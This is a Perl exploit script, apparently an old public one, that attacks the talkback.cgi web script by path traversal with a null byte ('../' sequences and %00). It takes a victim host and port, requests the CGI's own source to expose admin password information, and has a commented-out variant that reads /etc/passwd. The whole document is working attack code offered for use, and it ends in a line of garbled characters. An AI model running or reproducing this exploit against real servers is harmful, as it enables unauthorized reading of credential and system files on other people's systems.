#!/usr/bin/perl # The script fails to check for '../' sequences and null bytes # in the HTML variable # # -dkl- by NeMeS||y - dragon@shellnow.it use LWP::UserAgent; use Getopt::Std; sub usage() { print "\n-dkl- -dkl-\n\n"; print "Usage: ".$0." -v [port]\n\n"; print "default port : 80\n\n"; exit 1; } getopts('v:h', \%opt)||die("Problems... damn!!\n"); if(defined($opt{'h'})) { \&usage() } if(defined($opt{'v'})) { $victim=$opt{'v'} } else { \&usage() } if ($ARGV[0] eq '') { $port = 80; } else { $port = $ARGV[0]; }; #to display the contents of the /etc/passwd #$string = "/cgi/bin/talkback.cgi?article=../../../../etc/passwd%00&action=&view&matchview=1"; #the source of talkback.cgi, which includes admin password information. $string = "/cgi/bin/talkback.cgi?article=../cgi-bin/talkback.cgi?%00&action=view&matchview=1"; print "\nTalkBack.cgi exploit Coded by NeMeS||y\n\n"; print "Victim :: ".$victim."\n"; print "Port :: ".$port."\n\n"; $exp_string = "http://".$victim.$string; $hdrs = new HTTP::Headers(Accept => 'text/plain', User-Agent => 'NeMBrowser/1.0'); $url = new URI::URL($exp_string); $req = new HTTP::Request(GET, $url, $hdrs); $ua = new LWP::UserAgent; $resp = $ua->request($req); if ($resp->is_success) { print "Message :\n".$resp->content; } else { print "Message :\n".$resp->message; } print "\n\nE0F by NeMeS||y \n\n"; #dedicated to Annalisa

��ֻ�о�Ʒ��Ƶ